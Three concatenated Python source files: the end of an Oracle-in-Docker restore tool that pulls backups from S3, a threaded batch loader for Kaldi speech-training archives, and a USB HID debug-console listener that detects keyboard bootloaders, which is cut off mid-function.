logging.StreamHandler(sys.stdout)
## s3 functions
def create_s3conn(access_key, secret_key): #open s3 connection
try:
s3connection=S3Connection(access_key, secret_key)
except boto.exception.AWSConnectionError as error:
logging.error('unexpected response while trying connect to aws s3 [%s]' % error.args[0])
sys.exit(-1)
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
return s3connection
def retrieve_s3bucket_info(s3connection, s3_bucket_name): #get s3 bucket files
try:
s3_bucket_conn=s3connection.lookup(s3_bucket_name)
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3DataError as error:
logging.error('error while retrieving data from s3 [%s]' % error.args[0])
sys.exit(-1)
return s3_bucket_conn
def download_file(s3_file, file_dest_path): #download a single file from s3 bucket
if os.path.exists(file_dest_path):
if os.path.getsize(file_dest_path) != s3_file.size:
logging.warning('file \'%s\' already exists and is corrupted. Downloading again (%s mb)' % (file_dest_path, str(round(int(s3_file.size)/(1024*1024),2))))
else:
logging.warning('file \'%s\' already exists' % file_dest_path)
return
else:
logging.info('downloading file \'%s\' (%s mb)' % (file_dest_path, str(round(int(s3_file.size)/(1024*1024),2))))
try_limit=3 #times to attempt the download
timeout_sleep=5 #sleep time in seconds to wait after a timeout
try_count=0
download_success=False
while(download_success==False and try_count<try_limit):
try:
try_count = try_count + 1
s3_file.get_contents_to_filename(file_dest_path)
if os.path.getsize(file_dest_path) != s3_file.size:
logging.warning('file \'%s\' is corrupted. Downloading again (attempt: %s of %s)' % (file_dest_path, str(round(int(s3_file.size)/(1024*1024),2)), str(try_count), str(try_limit)))
else:
download_success=True
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3DataError as error:
logging.error('error while retrieving data from s3 [%s]' % error.args[0])
sys.exit(-1)
except boto.exception.S3CopyError as error:
logging.error('error while copying data from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3PermissionsError as error:
logging.error('permission denied on s3 file \'\' [%s]' % error.args[0])
sys.exit(-1)
except socket.timeout as error:
logging.warning('timeout occurred. Download attempt: %s of %s' %(try_count, try_limit))
time.sleep(timeout_sleep)
if(download_success==False):
logging.error('s3 download timeout reached or file is corrupted. Please check your connection and s3 bucket information')
sys.exit(-1)
def get_s3_full_path_dir(s3_bucket):
s3_bucket_name=s3_bucket.split('/')[2]
s3_full_path_dir='/'.join(s3_bucket.split('/')[s3_bucket.split('/').index(s3_bucket_name)+1:])
return s3_full_path_dir,s3_bucket_name
def download_s3(database_list, backup_dir, access_key, secret_key): #download all files from s3 bucket
s3connection=create_s3conn(access_key, secret_key)
for database, info in database_list.items():
memory = info.get('memory')
service_name = info.get('service_name')
s3_bucket = info.get('s3_bucket')
backup_dir = info.get('backup_directory')
logging.debug('looking for backup files in s3 bucket \'%s\' for database %s' % (s3_bucket, database))
(s3_full_path_dir,s3_bucket_name)=get_s3_full_path_dir(s3_bucket)
s3_bucket_conn=retrieve_s3bucket_info(s3connection, s3_bucket_name)
create_directory(backup_dir)
for s3_file in s3_bucket_conn.list(s3_full_path_dir,''):
s3_file_name = s3_file.name.split('/')[-1]
file_dest_path = backup_dir +'/'+ s3_file_name
download_file(s3_file, file_dest_path)
s3connection.close
## all preprocess
def preprocess_restore_args(args):
if args['--s3-bucket'] is None:
args['--s3-bucket']='-'+',-'*args['DATABASE'].count(',')
else:
args['--s3-bucket']=args['--s3-bucket'].replace('/,',',').rstrip('/')
args['--datafile-dir']=args['--datafile-dir'].replace('/,',',').rstrip('/')
args['--backup-directory']=args['--backup-directory'].replace('/,',',').rstrip('/')
args['--oradock-home']=args['--oradock-home'].rstrip('/')
def preprocess_restart_args(args):
args['--s3-bucket']='-'+',-'*args['DATABASE'].count(',')
args['--backup-directory']='-'+',-'*args['DATABASE'].count(',')
args['--datafile-dir']=args['--datafile-dir'].replace('/,',',').rstrip('/')
args['--oradock-home']=args['--oradock-home'].rstrip('/')
def preprocess_create_image_args(args):
args['--oradock-home']=args['--oradock-home'].rstrip('/')
def preprocess_create_database_args(args):
args['--s3-bucket']='-'+',-'*args['DATABASE'].count(',')
args['--backup-directory']='-'+',-'*args['DATABASE'].count(',')
args['--oradock-home']=args['--oradock-home'].rstrip('/')
args['--datafile-dir']=args['--datafile-dir'].replace('/,',',').rstrip('/')
## all params check
def check_args_count(arg1, arg2): #check 2 input options
if arg1.count(',')!=arg2.count(','):
logging.error('missing arguments - number of databases does not match with arguments info')
sys.exit(-1)
def check_s3_bucket(s3_access_key, s3_secret_key, s3_bucket, database):
if (s3_access_key is None and not s3_secret_key is None):# or (not args['--s3-access-key'] is None and args['--s3-secret-key'] is None):
logging.error('please provide a valid s3 access and secret key')
sys.exit(-1)
s3connection=create_s3conn(s3_access_key,s3_secret_key)
if not s3_bucket is None:
for s3_bucket_list in s3_bucket.split(','): #check conn to s3 and if bucket exists
s3_bucket_name=s3_bucket_list.split('/')[2]
s3_full_path_dir='/'.join(s3_bucket_list.split('/')[s3_bucket_list.split('/').index(s3_bucket_name)+1:])
logging.debug('checking for bucket \'%s\'' % s3_bucket_name)
try:
s3_bucket_conn=s3connection.lookup(s3_bucket_name)
except boto.exception.S3PermissionsError as error:
logging.error('permission denied at bucket %s [%s]' % (s3_bucket_name, error.args[0]))
sys.exit(-1)
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3DataError as error:
logging.error('error while retrieving data from s3 [%s]' % error.args[0])
sys.exit(-1)
if s3_bucket_conn is None:
logging.error('s3 bucket \'%s\' does not exists. Please, review your bucket name and access/secret key' % s3_bucket_name)
sys.exit(-1)
if len(list(s3_bucket_conn.list(s3_full_path_dir,'/')))==0:
logging.error('s3 backup directory \'%s\' does not exists' % s3_bucket_name)
check_args_count(database, s3_bucket)
s3connection.close
def check_file_or_directories_warn(file_or_dir, database):
if file_or_dir.find('/backup/$DATABASE')==0:
file_or_dir=''
for database_name in database.split(','):
file_or_dir+='/backup/'+database_name+','
file_or_dir=file_or_dir.rstrip(',')
for path in file_or_dir.split(','):
if not os.path.exists(path):
logging.warn('file or directory \'%s\' does not exists' % path)
def check_file_or_directories_error(file_or_dir, database):
if file_or_dir.find('/backup/$DATABASE')==0:
file_or_dir=''
for database_name in database.split(','):
file_or_dir+='/backup/'+database_name+','
file_or_dir=file_or_dir.rstrip(',')
for path in file_or_dir.split(','):
if not os.path.exists(file_or_dir):
logging.error('file or directory \'%s\' does not exists' % file_or_dir)
sys.exit(-1)
def check_memory(memory):
total_percent_memory=0
for each_memory_percent in memory.split(','): #validating memory sum percent
total_percent_memory = total_percent_memory+int(each_memory_percent)
if total_percent_memory > 100 or total_percent_memory < 0:
logging.error('memory exceeds server capacity')
sys.exit(-1)
def check_port(port):
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result=sock.connect_ex(('127.0.0.1',int(port)))
if int(port) < 1 or int(port) > 65535:
logging.error('port number exceeds the OS limit')
sys.exit(-1)
elif result==0:
logging.error('port is already in use. Please change port number to a free socket')
sys.exit(-1)
def check_and_create_oinstall_dir(oradock_home, oinstall_dir):
oinstall_dir_default=oradock_home+'/conf/dockerfile/config_files/database'
if not os.path.exists(oinstall_dir_default):
if oinstall_dir.find('$ORADOCK_HOME')==0:
logging.error('directory with Oracle Install binary files does not exists [ %s ]' % oinstall_dir_default)
sys.exit(-1)
elif not os.path.exists(oinstall_dir):
logging.error('directory with Oracle Install binary files does not exists [ %s ]' % oinstall_dir)
sys.exit(-1)
logging.info('copying install directory at \'%s\' to \'%s\'' % (oinstall_dir, oinstall_dir_default))
copytree(oinstall_dir, oinstall_dir_default)
def check_dockerfile_template(dockerfile):
if dockerfile.find('$ORADOCK_HOME')==-1 and not os.path.exists(dockerfile): #check if dockerfile has default value
logging.error('dockerfile does not exists')
sys.exit(-1)
def check_container(docker_client, args):
if args['--container-name'].find('oradock-db-$DATABASE')==0:
args['--container-name']='oradock-db-'+args['DATABASE'].replace(',', '-')
if len(docker_client.containers(all=True, filters={'name':args['--container-name']}))!=0:
logging.error('container \'%s\' already exists' % args['--container-name'])
sys.exit(-1)
def check_image(image_name, docker_client):
if len(docker_client.images(name=image_name))!=0:
logging.error('image \'%s\' already exists' % image_name)
sys.exit(-1)
def check_restore_params(args, docker_client):
check_s3_bucket(args['--s3-access-key'], args['--s3-secret-key'], args['--s3-bucket'], args['DATABASE'])
check_args_count(args['DATABASE'], args['MEMORY'])
check_args_count(args['DATABASE'], args['SERVICE_NAME'])
check_args_count(args['DATABASE'], args['--backup-directory'])
check_file_or_directories_warn(args['--backup-directory'], args['DATABASE'])
check_file_or_directories_error(args['--oradock-home'], args['DATABASE'])
check_memory(args['MEMORY'])
check_port(args['--port'])
check_container(docker_client, args)
def check_restart_params(args, docker_client):
check_args_count(args['DATABASE'], args['MEMORY'])
check_args_count(args['DATABASE'], args['SERVICE_NAME'])
check_file_or_directories_error(args['--oradock-home'], args['DATABASE'])
check_memory(args['MEMORY'])
check_port(args['--port'])
check_container(docker_client, args)
def check_create_image_params(args, docker_client):
check_and_create_oinstall_dir(args['--oradock-home'], args['--oinstall-dir'])
check_dockerfile_template(args['--dockerfile-template'])
check_image(args['IMAGE_NAME'], docker_client)
def check_create_database_params(args, docker_client):
check_args_count(args['DATABASE'], args['MEMORY'])
check_args_count(args['DATABASE'], args['SERVICE_NAME'])
check_file_or_directories_error(args['--oradock-home'], args['DATABASE'])
check_memory(args['MEMORY'])
check_port(args['--port'])
check_container(docker_client, args)
## auxiliary function
def create_database_settings(args): #create a dict with database infos
database = {}
if args['--backup-directory'].find('/backup/$DATABASE')==0:
args['--backup-directory']=''
for database_name in args['DATABASE'].split(','):
args['--backup-directory']+='/backup/'+database_name+','
args['--backup-directory']=args['--backup-directory'].rstrip(',')
for database_name, memory, service_name, s3_bucket, backup_dir in zip( args['DATABASE'].split(','),
args['MEMORY'].split(','),
args['SERVICE_NAME'].split(','),
args['--s3-bucket'].split(','),
args['--backup-directory'].split(',')):
database[database_name] = {'memory':memory, 'service_name':service_name, 's3_bucket':s3_bucket, 'backup_directory':backup_dir}
logging.debug('database info: %s' % database)
return database
def create_directory(directory): #create directory to save s3 files
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as error:
if error.errno == errno.ENOENT :
logging.error('error creating directory \'%s\'. No such file or directory' % directory)
sys.exit(-1)
elif error.errno == errno.EACCES:
logging.error('error creating directory \'%s\'. Permission denied' % directory)
sys.exit(-1)
else:
logging.error('error creating directory \'%s\'. %s' % (directory, str(error)))
sys.exit(-1)
def change_directory_owner(directory, uid, gid):
if os.path.exists(directory):
msg_flag=0
for root, directories, files in os.walk(directory):
try:
os.chown(root, uid, gid)
for each_directory in directories:
os.chown(root +'/'+ each_directory, uid, gid)
for each_files in files:
os.chown(root + '/'+ each_files, uid, gid)
except OSError as error:
if msg_flag==0:
if error.errno == errno.EPERM:
logging.warn('could not change permissions on directory \'%s\'. Permission denied' % directory)
else:
logging.warn('could not change permissions on directory\'%s\'. %s' % (directory, str(error)))
msg_flag=1
def set_docker_volumes(database_list, datafile_dir, oradock_home): #configure all volumes required to start the container
container_volumes=[]
container_volumes_config=[]
for database, info in database_list.items():
container_volumes.append(datafile_dir + '/' + database)
container_volumes.append('/u01/app/oracle/diag/rdbms/' + database)
container_volumes_config.append(datafile_dir +'/'+ database +':'+ datafile_dir +'/'+ database)
container_volumes_config.append('/tmp/' + database + ':/u01/app/oracle/diag/rdbms/' + database)
if info.get('backup_directory')!='-':
container_volumes.append(info.get('backup_directory'))
container_volumes_config.append(info.get('backup_directory') +':'+ info.get('backup_directory'))
container_volumes.append(oradock_home + '/conf')
container_volumes.append(oradock_home + '/database')
container_volumes.append(oradock_home + '/consume')
container_volumes_config.append(oradock_home + '/conf:' + oradock_home + '/conf')
container_volumes_config.append(oradock_home + '/database:' + oradock_home + '/database')
container_volumes_config.append(oradock_home + '/consume:' + oradock_home + '/consume')
return container_volumes, container_volumes_config
def prepare_dockerfile(dockerfile_name, str_source, str_dest):
try:
dockerfile_template=open(dockerfile_name, 'r').read()
dockerfile=open(dockerfile_name+'.new','w')
sed_process=re.compile(str_source, re.MULTILINE)
dockerfile.write(sed_process.sub(str_dest, dockerfile_template))
dockerfile.close()
copyfile(dockerfile_name+'.new', dockerfile_name)
os.remove(dockerfile_name+'.new')
except OSError as error:
if error.errno == errno.ENOENT :
logging.error('error to create dockerfile \'%s\'. No such file or directory' % dockerfile_name)
sys.exit(-1)
elif error.errno == errno.EACCES:
logging.error('error to create dockerfile \'%s\'. Permission denied' % dockerfile_name)
sys.exit(-1)
else:
logging.error('error to create directory \'%s\'. %s' % (dockerfile_name, str(error)))
sys.exit(-1)
def call_process_build(function_name, arguments, animation):
docker_build_log=Manager().list()
arguments+=(docker_build_log,)
process=Process(name=function_name, target=function_name, args=arguments)
process.start()
animation = '-\\|/'
idx=0
man_animation=['(>\'.\')>', '<(\'.\'<)']
if(animation=='2'):
man_animation=['\\o/', '|o|', '\\o/', '|o|']
if (logging.getLogger().getEffectiveLevel()!=logging.DEBUG):
while process.exitcode is None:
print('\r' + animation[idx % len(animation)] + ' Executing... ' + man_animation[idx % len(man_animation)] + '', end='')
idx = idx + 1
time.sleep(0.2)
else:
process.join()
print('\r', end='')
return docker_build_log
## docker function
def docker_build(docker_client, image_name, dockerfile_dir, docker_image):
try:
oradock_image=[line for line in docker_client.build(path=dockerfile_dir, stream=True, rm=True, tag=image_name)]
docker_image.append(oradock_image)
except docker_error.APIError as error:
logging.error('error creating image \'%s\' [%s]' % (image_name, error.args[0]))
sys.exit(-1)
except TypeError as error:
logging.error('error creating image \'%s\' [%s]' % (image_name, error.args[0]))
sys.exit(-1)
except KeyboardInterrupt as error:
sys.exit(-1)
def docker_start(docker_client, image_name, container_name, container_volumes, container_volumes_config, container_port_config): #starts a container
try:
oradock_container=docker_client.create_container(image=image_name,
name=container_name,
hostname=os.uname()[1] ,
user='oracle',
detach=True,
ports=[1521],
tty=True,
volumes=container_volumes,
host_config =
docker_client.create_host_config(
binds=container_volumes_config,
port_bindings=container_port_config,
privileged=True)
)
docker_client.start(oradock_container)
except docker_error.APIError as error:
logging.error('error while trying to start container [%s]' % error.args[0])
sys.exit(-1)
return oradock_container
def docker_run(docker_client, oradock_container, command, log): #executes a command inside the container
try:
logging.debug('executing bash inside container: %s' % command)
config_exec=docker_client.exec_create( container=oradock_container['Id'],
cmd=command,
user='oracle',
stdout=True,
stderr=True,
tty=False)
for exec_log in docker_client.exec_start( exec_id=config_exec['Id'],
tty=False,
detach=False,
stream=True):
exec_output = ''.join(chr(x) for x in exec_log)
exec_output = exec_output.strip()
print('\r'+exec_output)
except docker_error.APIError as error:
logging.error('error while trying to execute command \'%s\' on container: %s ' % (command, error.args[0]))
except docker_error.DockerException as error:
logging.error('error while trying to execute docker command: %s ' % error.args[0])
def docker_pull(docker_client, image_name, log):
try:
docker_client.pull(repository=image_name, stream=False)
except docker_error.DockerException as error:
logging.error('error while trying to download docker image: %s ' % error.args[0])
sys.exit(-1)
#oradock argument final function
def restore_or_restart_or_create_database(args, database_list, docker_client): #restore all databases inside the container
if len(docker_client.images(name=args['--image-name']))==0 or args['--force-pull']==True:
logging.info('Downloading or updating image \'%s\'' % args['--image-name'])
process_args=(docker_client, args['--image-name'])
call_process_build(docker_pull, process_args, args['--animation'])
logging.debug('defining volumes to mount into container')
for database, info in database_list.items():
create_directory(args['--datafile-dir']+'/'+database)
create_directory('/tmp/' + database)
change_directory_owner(args['--datafile-dir']+'/'+database, 501, 503)
change_directory_owner('/tmp/' + database, 501, 503)
change_directory_owner(info.get('backup_directory'), 501, 503)
(container_volumes, container_volumes_config)=set_docker_volumes(database_list, args['--datafile-dir'], args['--oradock-home'])
container_port_config={1521 : args['--port']}
logging.info('creating & starting container \'%s\'' % args['--container-name'])
oradock_container=docker_start(docker_client, args['--image-name'], args['--container-name'], container_volumes, container_volumes_config, container_port_config)
logging.info('container started')
logging.info('executing database script inside container')
command_args=[]
if args['restore']==True:
command_args.append(args['--backup-directory'])
script_name='restore'
elif args['restart']==True:
script_name='restart'
elif args['create']==True and args['database']==True:
command_args.append(args['PASSWORD'])
script_name='create'
command_args.append(args['DATABASE'])
command_args.append(args['MEMORY'])
command_args.append(args['SERVICE_NAME'])
command_args.append(args['--oradock-home'])
command_args.append(args['--datafile-dir'])
command_args.append(args['--spfile-name'])
command_args.append(args['--control-file-name'])
command_args.append(args['--parallel'])
command_args.append(' > /tmp/'+script_name+'_database.log')
command = '/bin/bash '+ args['--oradock-home'] +'/database/'+ script_name + '_database.sh '+ ' '.join(command_args)
process_args=(docker_client, oradock_container, command)
docker_exec_log=call_process_build(docker_run, process_args, args['--animation'])
def create_image(args, docker_client):
oinstall_dir=args['--oradock-home']+'/conf/dockerfile/config_files/database'
with open(oinstall_dir+'/install/oraparam.ini', 'r') as config_file: #search for oracle binary install version
install_version=None
for line in config_file:
if line.find('OUI_VERSION')!=-1:
install_version=line.rstrip().split('=')[1]
if install_version is None:
logging.error('cannot find oracle install binary versions. Please, check if file \'%s\' exists' % oinstall_dir+'/install/oraparam.ini')
sys.exit(-1)
dockerfile=args['--oradock-home']+'/conf/dockerfile/Dockerfile'
if args['--dockerfile-template'].find('$ORADOCK_HOME')==0:
copyfile(dockerfile+'.template', dockerfile) #replace password and install versions into dockerfile
else:
copytree(args['--dockerfile-template'], dockerfile)
prepare_dockerfile(dockerfile, '\${password}', args['PASSWORD'])
prepare_dockerfile(dockerfile, '\${install_version}', install_version)
prepare_dockerfile(dockerfile, '\${oinstall_dir}', args['--oinstall-dir'])
prepare_dockerfile(dockerfile, '\${hostname}', socket.gethostname())
logging.info('dockerfile created at \'%s\'' % dockerfile)
logging.info('creating image \'%s\'' % args['IMAGE_NAME'])
process_args=(docker_client, args['IMAGE_NAME'], args['--oradock-home']+'/conf/dockerfile')
docker_build_log=call_process_build(docker_build, process_args, args['--animation'])
for exec_log in docker_build_log[0]:
exec_output = ''.join(chr(x) for x in exec_log)
exec_output = eval(exec_output.replace('\\n"}', '"}'))
try:
logging.debug(exec_output['stream'])
except KeyError as error:
logging.error('docker build could not execute due to error [%s]' % str(error))
sys.exit(-1)
rmtree(args['--oradock-home']+'/conf/dockerfile/config_files/database')
logging.info('docker image successfully created')
os.remove(args['--oradock-home']+'/conf/dockerfile/Dockerfile')
## main
if __name__ == '__main__':
arguments = docopt(__doc__, version=__version__)
#print(arguments)
set_log(arguments['--log-level'])
docker_client=Client(base_url='unix://var/run/docker.sock')
try:
#call for restore option
if arguments['restore']==True:
check_restore_params(arguments, docker_client)
preprocess_restore_args(arguments)
database=create_database_settings(arguments)
if arguments['--s3-bucket']!='-':
download_s3(database, arguments['--backup-directory'], arguments['--s3-access-key'], arguments['--s3-secret-key'])
restore_or_restart_or_create_database(arguments, database, docker_client)
#call for restart option
elif arguments['restart']==True:
check_restart_params(arguments, docker_client)
preprocess_restart_args(arguments)
database=create_database_settings(arguments)
restore_or_restart_or_create_database(arguments, database, docker_client)
#call for create image/database option
elif arguments['create']==True:
if arguments['image']==True:
check_create_image_params(arguments, docker_client)
preprocess_create_image_args(arguments)
create_image(arguments, docker_client)
elif arguments['database']==True:
check_create_database_params(arguments, docker_client)
preprocess_create_database_args(arguments)
database=create_database_settings(arguments)
restore_or_restart_or_create_database(arguments, database, docker_client)
except KeyboardInterrupt as error:
print('\nSee ya! ')
|
kaldi_egs.py
|
from utils.misc import get_logger
log = get_logger()
import threading, time
import utils.kaldi_io
import numpy as np
def load_and_prep_dev_set_tar(egs_dir, nnet3_copy_egs_to_feats):
dev_feat_rsp = "ark:" + nnet3_copy_egs_to_feats + " ark:" + egs_dir + "/valid_egs.1.ark ark:- |"
dev_feats_generator = utils.kaldi_io.read_mat_ark(dev_feat_rsp)
dev_set = list(dev_feats_generator)
dev_lab = np.array([int(dev_set[i][0].split("-")[-1]) for i in range(len(dev_set))])
dev_feat = np.vstack([dev_set[i][1][np.newaxis,:,:] for i in range(len(dev_set))])
dev_idx = list(range(0, dev_feat.shape[0]*(dev_feat.shape[1]+1), dev_feat.shape[1]))
return dev_lab, dev_feat.reshape(1,-1,dev_feat.shape[2]), dev_idx
class egsBatchQue(object):
def __init__(self, nnet3_copy_egs_to_feats, archive_path, b_size, n_archives, ark_que_length, feat_size=40, do_shuffle=False):
self.delete = False
self.nnet3_copy_egs_to_feats = nnet3_copy_egs_to_feats
self.archive_path = archive_path
self.b_size = b_size
self.n_archives = n_archives
self.ark_que_length = ark_que_length
self.feat_size = feat_size
self.do_shuffle = do_shuffle
if self.do_shuffle:
self.archive_list = np.random.permutation( len( self.n_archives ) ) +1 # +1 Because egs indices starts from 1
log.debug( "Shuffled the archive list " )
else:
self.archive_list = np.arange( self.n_archives ) +1 # np.random.permutation( len( self.n_archives ) )
self.qued_archives = []
self.archive_idx = 0 # Index for which archive to process
self.batch_idx_ark = 0 # Index for where to start the batch within the current archive
self.batch_number = 1
self.batch_thread = threading.Thread( target =self.prep_archives )
self.batch_thread.daemon = True # This will make the process die if the main process dies I THINK...???
self.batch_thread.start()
def prep_archives( self ):
while not self.delete:
if ( len(self.qued_archives ) < self.ark_que_length ):
log.info( "Loading new archive" ) # self.qued_archives
# If we have reached the last archive.
if self.archive_idx == len( self.archive_list ) -1:
self.archive_idx = 0
if self.do_shuffle:
self.archive_list = np.random.permutation( len( self.n_archives ) ) + 1
log.debug( "Shuffled the archive list " )
feat_rsp="ark:" + self.nnet3_copy_egs_to_feats + " ark:" + self.archive_path + "/egs." + str( self.archive_list[ self.archive_idx ] ) + ".ark ark:- |"
feats_generator=utils.kaldi_io.read_mat_ark(feat_rsp)
a=list(feats_generator)
lab=np.array([int(a[i][0].split("-")[-1]) for i in range(len(a))])
feat=np.vstack([a[i][1][np.newaxis,:,:] for i in range(len(a))])
log.debug("loading archive done.")
self.archive_idx += 1
if self.do_shuffle:
idx=np.random.permutation( len(lab) )
feat = feat[idx]
lab = lab[idx]
log.debug( "Shuffled the loaded archive." )
self.qued_archives.append( [lab,feat] )
def get_batch(self):
X=[]
U=[]
bad_tr_files = []
tr_idx = None
control_nb = 0
log.debug ( "Retrieving batch" )
while len(self.qued_archives) < 1:
time.sleep(1)
print(" " + str(len( self.qued_archives[0][0] )))
print(" " + str(self.batch_idx_ark + self.b_size))
if len( self.qued_archives[0][0] ) >= self.batch_idx_ark + self.b_size:
assert ( len( self.qued_archives[0][1] ) == len( self.qued_archives[0][0] ) )
start = self.batch_idx_ark
end = self.batch_idx_ark + self.b_size
tr_feats = self.qued_archives[0][1][start:end]
Y = self.qued_archives[0][0][start:end]
self.batch_idx_ark = end
else:
assert ( len( self.qued_archives[0][1] ) == len( self.qued_archives[0][0] ) )
start = self.batch_idx_ark
end = self.batch_idx_ark + self.b_size # Will be beyond last index but this is OK
tr_feats = self.qued_archives[0][1][start:end]
Y = self.qued_archives[0][0][start:end]
self.qued_archives.pop(0)
n_needed = self.b_size - Y.shape[0]
while len(self.qued_archives) < 1 :
time.sleep(1)
assert ( len( self.qued_archives[0][1] ) == len( self.qued_archives[0][0] ) )
log.debug( tr_feats.shape )
log.debug( self.qued_archives[0][1][0:n_needed].shape )
log.debug( Y.shape )
log.debug( self.qued_archives[0][0][0:n_needed].shape )
tr_feats = np.vstack( (tr_feats, self.qued_archives[0][1][0:n_needed]) )
Y = np.hstack( (Y, self.qued_archives[0][0][0:n_needed]) )
self.batch_idx_ark = n_needed
self.batch_number += 1
return [[X, Y, U], [bad_tr_files], [tr_feats.astype('float32'), tr_idx], self.batch_number, control_nb]
|
console.py
|
"""Acquire debugging information from usb hid devices
cli implementation of https://www.pjrc.com/teensy/hid_listen.html
"""
from pathlib import Path
from threading import Thread
from time import sleep, strftime
import hid
import usb.core
from milc import cli
LOG_COLOR = {
'next': 0,
'colors': [
'{fg_blue}',
'{fg_cyan}',
'{fg_green}',
'{fg_magenta}',
'{fg_red}',
'{fg_yellow}',
],
}
KNOWN_BOOTLOADERS = {
# VID , PID
('03EB', '2FEF'): 'atmel-dfu: ATmega16U2',
('03EB', '2FF0'): 'atmel-dfu: ATmega32U2',
('03EB', '2FF3'): 'atmel-dfu: ATmega16U4',
('03EB', '2FF4'): 'atmel-dfu: ATmega32U4',
('03EB', '2FF9'): 'atmel-dfu: AT90USB64',
('03EB', '2FFA'): 'atmel-dfu: AT90USB162',
('03EB', '2FFB'): 'atmel-dfu: AT90USB128',
('03EB', '6124'): 'Microchip SAM-BA',
('0483', 'DF11'): 'stm32-dfu: STM32 BOOTLOADER',
('16C0', '05DC'): 'USBasp: USBaspLoader',
('16C0', '05DF'): 'bootloadHID: HIDBoot',
('16C0', '0478'): 'halfkay: Teensy Halfkay',
('1B4F', '9203'): 'caterina: Pro Micro 3.3V',
('1B4F', '9205'): 'caterina: Pro Micro 5V',
('1B4F', '9207'): 'caterina: LilyPadUSB',
('1C11', 'B007'): 'kiibohd: Kiibohd DFU Bootloader',
('1EAF', '0003'): 'stm32duino: Maple 003',
('1FFB', '0101'): 'caterina: Polou A-Star 32U4 Bootloader',
('2341', '0036'): 'caterina: Arduino Leonardo',
('2341', '0037'): 'caterina: Arduino Micro',
('239A', '000C'): 'caterina: Adafruit Feather 32U4',
('239A', '000D'): 'caterina: Adafruit ItsyBitsy 32U4 3v',
('239A', '000E'): 'caterina: Adafruit ItsyBitsy 32U4 5v',
('239A', '000E'): 'caterina: Adafruit ItsyBitsy 32U4 5v',
('2A03', '0036'): 'caterina: Arduino Leonardo',
('2A03', '0037'): 'caterina: Arduino Micro',
('314B', '0106'): 'apm32-dfu: APM32 DFU ISP Mode'
}
class MonitorDevice(object):
def __init__(self, hid_device, numeric):
self.hid_device = hid_device
self.numeric = numeric
self.device = hid.Device(path=hid_device['path'])
self.current_line = ''
cli.log.info('Console Connected: %(color)s%(manufacturer_string)s %(product_string)s{style_reset_all} (%(color)s%(vendor_id)04X:%(product_id)04X:%(index)d{style_reset_all})', hid_device)
def read(self, size, encoding='ascii', timeout=1):
"""Read size bytes from the device.
"""
return self.device.read(size, timeout).decode(encoding)
def read_line(self):
"""Read from the device's console until we get a \n.
"""
while '\n' not in self.current_line:
self.current_line += self.read(32).replace('\x00', '')
lines = self.current_line.split('\n', 1)
self.current_line = lines[1]
return lines[0]
def run_forever(self):
while True:
try:
message = {**self.hid_device, 'text': self.read_line()}
identifier = (int2hex(message['vendor_id']), int2hex(message['product_id'])) if self.numeric else (message['manufacturer_string'], message['product_string'])
message['identifier'] = ':'.join(identifier)
message['ts'] = '{style_dim}{fg_green}%s{style_reset_all} ' % (strftime(cli.config.general.datetime_fmt),) if cli.args.timestamp else ''
cli.echo('%(ts)s%(color)s%(identifier)s:%(index)d{style_reset_all}: %(text)s' % message)
except hid.HIDException:
break
class FindDevices(object):
def __init__(self, vid, pid, index, numeric):
self.vid = vid
self.pid = pid
self.index = index
self.numeric = numeric
def run_forever(self):
"""Process messages from our queue in a loop.
"""
live_devices = {}
live_bootloaders = {}
while True:
try:
for device in list(live_devices):
if not live_devices[device]['thread'].is_alive():
cli.log.info('Console Disconnected: %(color)s%(manufacturer_string)s %(product_string)s{style_reset_all} (%(color)s%(vendor_id)04X:%(product_id)04X:%(index)d{style_reset_all})', live_devices[device])
del live_devices[device]
for device in self.find_devices():
if device['path'] not in live_devices:
device['color'] = LOG_COLOR['colors'][LOG_COLOR['next']]
LOG_COLOR['next'] = (LOG_COLOR['next'] + 1) % len(LOG_COLOR['colors'])
live_devices[device['path']] = device
try:
monitor = MonitorDevice(device, self.numeric)
device['thread'] = Thread(target=monitor.run_forever, daemon=True)
device['thread'].start()
except Exception as e:
device['e'] = e
device['e_name'] = e.__class__.__name__
cli.log.error("Could not connect to %(color)s%(manufacturer_string)s %(product_string)s{style_reset_all} (%(color)s:%(vendor_id)04X:%(product_id)04X:%(index)d): %(e_name)s: %(e)s", device)
if cli.config.general.verbose:
cli.log.exception(e)
del live_devices[device['path']]
if cli.args.bootloaders:
for device in self.find_bootloaders():
if device.address in live_bootloaders:
live_bootloaders[device.address]._qmk_found = True
else:
name = KNOWN_BOOTLOADERS[(int2hex(device.idVendor), int2hex(device.idProduct))]
cli.log.info('Bootloader Connected: {style_bright}{fg_magenta}%s', name)
device._qmk_found = True
live_bootloaders[device.address] = device
for device in list(live_bootloaders):
if live_bootloaders[device]._qmk_found:
live_bootloaders[device]._qmk_found = False
else:
name = KNOWN_BOOTLOADERS[(int2hex(live_bootloaders[device].idVendor), int2hex(live_bootloaders[device].idProduct))]
cli.log.info('Bootloader Disconnected: {style_bright}{fg_magenta}%s', name)
del live_bootloaders[device]
sleep(.1)
except KeyboardInterrupt:
break
def is_bootloader(self, hid_device):
"""Returns true if the device in question matches a known bootloader vid/pid.
"""
return (int2hex(hid_device.idVendor), int2hex(hid_device.idProduct)) in KNOWN_BOOTLOADERS
def is_console_hid(self, hid_device):
"""Returns true when the usage page indicates it's a teensy-style console.
"""
return hid_device['usage_page'] == 0xFF31 and hid_device['usage'] == 0x0074
def is_filtered_device(self, hid_device):
"""Returns True if the device should be included in the list of available consoles.
"""
return int2hex(hid_device['vendor_id']) == self.vid and int2hex(hid_device['product_id']) == self.pid
def find_devices_by_report(self, hid_devices):
"""Returns a list of available teensy-style consoles by doing a brute-force search.
Some versions of linux don't report usage and usage_page. In that case we fallback to reading the report (possibly inaccurately) ourselves.
"""
devices = []
for device in hid_devices:
path = device['path'].decode('utf-8')
if path.startswith('/dev/hidraw'):
number = path[11:]
report = Path(f'/sys/class/hidraw/hidraw{number}/device/report_descriptor')
if report.exists():
rp = report.read_bytes()
